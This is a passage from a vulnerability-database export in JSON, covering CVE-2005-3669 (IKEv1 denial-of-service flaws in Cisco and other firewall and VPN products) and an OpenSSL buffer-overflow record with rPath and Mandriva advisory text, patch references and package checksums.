          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(2)"
          },
          {
            "_id": null,
            "model": "ios 12.2 sxd7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3(1)"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_asa",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:enterprise_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:juniper:screenos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_firewall-1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Cisco Security bulletin NISCC  albatross@tim.it",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2005-3669",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-3669",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-14877",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-3669",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#226364",
                "trust": 0.8,
                "value": "16.54"
              },
              {
                "author": "NVD",
                "id": "CVE-2005-3669",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200511-271",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-14877",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Multiple unspecified vulnerabilities in the Internet Key Exchange version 1 (IKEv1) implementation in multiple Cisco products allow remote attackers to cause a denial of service (device reset) via certain malformed IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.  NOTE: due to the lack of details in the Cisco advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. Various Cisco IOS, PIX Firewall, Firewall Services Module (FWSM), VPN 3000 Series Concentrator, and MDS Series SanOS releases are prone to denial of service attacks.  These issues are due to security flaws in Cisco\u0027s IPSec implementation.  The vulnerabilities may be triggered by malformed IKE traffic. \nSuccessful attacks will cause most affected devices to restart.  For Cisco MDS Series devices, this is limited to causing the IKE process to restart. IP Security or IPSec (full name Internet Protocol Security) is a set of IP security protocols established by the IPSec group of the Internet Engineering Task Force (IETF). Access control, data source address verification, data integrity check and prevention of replay attacks. Vulnerabilities exist in the handling of IPSec IKE messages in several Cisco products. IPSec\u0027s PROTOS test suite can test the design limitations of IPSec implementations by sending malformed IKE messages to target devices. \n\nTITLE:\nIPsec-Tools ISAKMP IKE Message Processing Denial of Service\n\nSECUNIA ADVISORY ID:\nSA17668\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17668/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nIPsec-Tools 0.x\nhttp://secunia.com/product/3352/\n\nDESCRIPTION:\nA vulnerability has been reported in IPsec-Tools, which can be\nexploited by malicious people to cause a DoS (Denial of Service). \n\nThe vulnerability is caused due to a NULL pointer dereferencing error\nwhen processing certain ISAKMP packets in aggressive mode. \n\nThe vulnerability is related to:\nSA17553\n\nSuccessful exploitation requires a weak racoon configuration (e.g. no\nlifetime proposal or obey mode), and using 3DES/SHA1/DH2. \n\nSOLUTION:\nUpdate to version 0.6.3. \nhttp://sourceforge.net/project/showfiles.php?group_id=74601\u0026package_id=74949\u0026release_id=372605\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Adrian Portelli. \n\nORIGINAL ADVISORY:\nhttp://sourceforge.net/mailarchive/forum.php?thread_id=9017454\u0026forum_id=32000\nhttp://sourceforge.net/project/shownotes.php?release_id=372605\u0026group_id=74601\n\nOTHER REFERENCES:\nSA17553:\nhttp://secunia.com/advisories/17553/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          },
          {
            "db": "BID",
            "id": "15401"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          }
        ],
        "trust": 2.79
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "15401",
            "trust": 2.8
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669",
            "trust": 2.8
          },
          {
            "db": "SECUNIA",
            "id": "17553",
            "trust": 2.5
          },
          {
            "db": "SECTRACK",
            "id": "1015202",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1015198",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1015201",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1015200",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1015199",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "17621",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "17668",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17663",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17838",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17608",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17684",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2005.0924",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "17902",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271",
            "trust": 0.7
          },
          {
            "db": "CISCO",
            "id": "20051114 MULTIPLE VULNERABILITIES FOUND BY PROTOS IPSEC TEST SUITE",
            "trust": 0.6
          },
          {
            "db": "OVAL",
            "id": "OVAL:ORG.MITRE.OVAL:DEF:5226",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41739",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877"
          },
          {
            "db": "BID",
            "id": "15401"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          }
        ]
      },
      "id": "VAR-200511-0015",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-14877"
          }
        ],
        "trust": 0.55652413
      },
      "last_update_date": "2026-03-09T20:04:28.216000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00555601"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02076.html"
          },
          {
            "title": "PSN-2005-11-007",
            "trust": 0.8,
            "url": "http://www.juniper.net/support/security/alerts/PSN-2005-11-007.txt"
          },
          {
            "title": "AXSA-2006-65:1",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=362"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0267.html"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-1"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-3"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
            "url": "http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html"
          },
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
            "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/cisco-sa-20051114-ipsec-j.shtml"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
            "url": "http://www.symantec.com/region/jp/avcenter/security/content/2005.11.21.html"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.checkpoint.co.jp/"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0267J.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.3,
            "url": "http://jvn.jp/niscc/niscc-273756/index.html"
          },
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/15401"
          },
          {
            "trust": 2.5,
            "url": "http://www.kb.cert.org/vuls/id/226364"
          },
          {
            "trust": 2.0,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml"
          },
          {
            "trust": 1.7,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/"
          },
          {
            "trust": 1.7,
            "url": "http://www.niscc.gov.uk/niscc/docs/br-20051114-01013.html?lang=en"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015198"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015199"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015200"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015201"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015202"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/17553"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/17621/"
          },
          {
            "trust": 1.1,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5226"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17553/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17668/"
          },
          {
            "trust": 0.8,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp"
          },
          {
            "trust": 0.8,
            "url": "http://www.ficora.fi/suomi/tietoturva/varoitukset/varoitus-2005-82.htm"
          },
          {
            "trust": 0.8,
            "url": "http://www.auscert.org.au/5748"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17608/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17684/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17663/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17838/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-3669"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/products/vulnerabilitydisclosures/default.aspx?id=va-20051114-01014.xml"
          },
          {
            "trust": 0.8,
            "url": "http://www.frsirt.com/english/advisories/2005/2406"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-3669"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/17902"
          },
          {
            "trust": 0.8,
            "url": "http://www.cyberpolice.go.jp/important/2005/20051118_193244.html"
          },
          {
            "trust": 0.6,
            "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:5226"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3352/"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/showfiles.php?group_id=74601\u0026package_id=74949\u0026release_id=372605"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/mailarchive/forum.php?thread_id=9017454\u0026forum_id=32000"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=372605\u0026group_id=74601"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877"
          },
          {
            "db": "BID",
            "id": "15401"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-14877",
            "ident": null
          },
          {
            "db": "BID",
            "id": "15401",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "41739",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000681",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3669",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2005-11-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14877",
            "ident": null
          },
          {
            "date": "2005-11-14T00:00:00",
            "db": "BID",
            "id": "15401",
            "ident": null
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41739",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-271",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000681",
            "ident": null
          },
          {
            "date": "2005-11-18T21:03:00",
            "db": "NVD",
            "id": "CVE-2005-3669",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-01-03T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2018-10-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14877",
            "ident": null
          },
          {
            "date": "2005-11-14T00:00:00",
            "db": "BID",
            "id": "15401",
            "ident": null
          },
          {
            "date": "2009-03-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-271",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000681",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-3669",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Multiple vulnerabilities in Internet Key Exchange (IKE) version 1 implementations",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-271"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200609-1274

    Vulnerability from variot - Updated: 2026-03-07 22:10

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. rPath Security Advisory: 2006-0175-2 Published: 2006-09-28 Updated: 2006-09-29 Resolved issue in patch for CVE-2006-2940 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.

    29 September 2006 Update: The initial fix for this vulnerability was
    incomplete, and the fault in the fix could enable a Denial of Service
    attack in some cases of the attack described in CVE-2006-2940.
    

    Full-Disclosure - We believe in it.

    During the parsing of certain invalid ASN1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory. (CVE-2006-2937)

    Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack. (CVE-2006-2940)

    Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer. (CVE-2006-3738)

    Tavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code. (CVE-2006-4343)

    Updated packages are patched to address these issues.

    Update:

    There was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    Updated Packages:

    Mandriva Linux 2006.0: 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm 526fcd69e1a1768c82afd573dc16982f 2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

    Mandriva Linux 2006.0/X86_64: 54ed69fc4976d3c0953eeebd3c10471a 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm 632fbe5eaff684ec2f27da4bbe93c4f6 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 04dbe52bda3051101db73fabe687bd7e 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm ca169246cc85db55839b265b90e8c842 2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

    Mandriva Linux 2007.0: db68f8f239604fb76a0a10c70104ef61 2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm a97c6033a33fabcd5509568304b7a988 2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: 1895971ef1221056075c4ee3d4aaac72 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm cfd59201e5e9c436f42b969b4aa567f1 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm 36da85c76eddf95feeb3f4b792528483 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm db68f8f239604fb76a0a10c70104ef61 2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm e3aebeae455a0820c5f28483bd6d3fa5 2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Corporate 3.0: 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 1e7834f6f0fe000f8f00ff49ee6f7ea0 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm 6c86220445ef34c2dadadc3e00701885 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm c25c4042a91b6e7bf9aae1aa2fea32a5 corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 3.0/X86_64: 52dfd4d10e00c9bd0944e4486190de93 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm 258a19afc44dadfaa00d0ebd8b3c0df4 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm cd5cc151e476552be549c6a37b8a71ea corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 492fcc0df9172557a3297d0082321d4d corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 4.0: 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm daa6c3473f59405778dedd02de73fcc9 corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

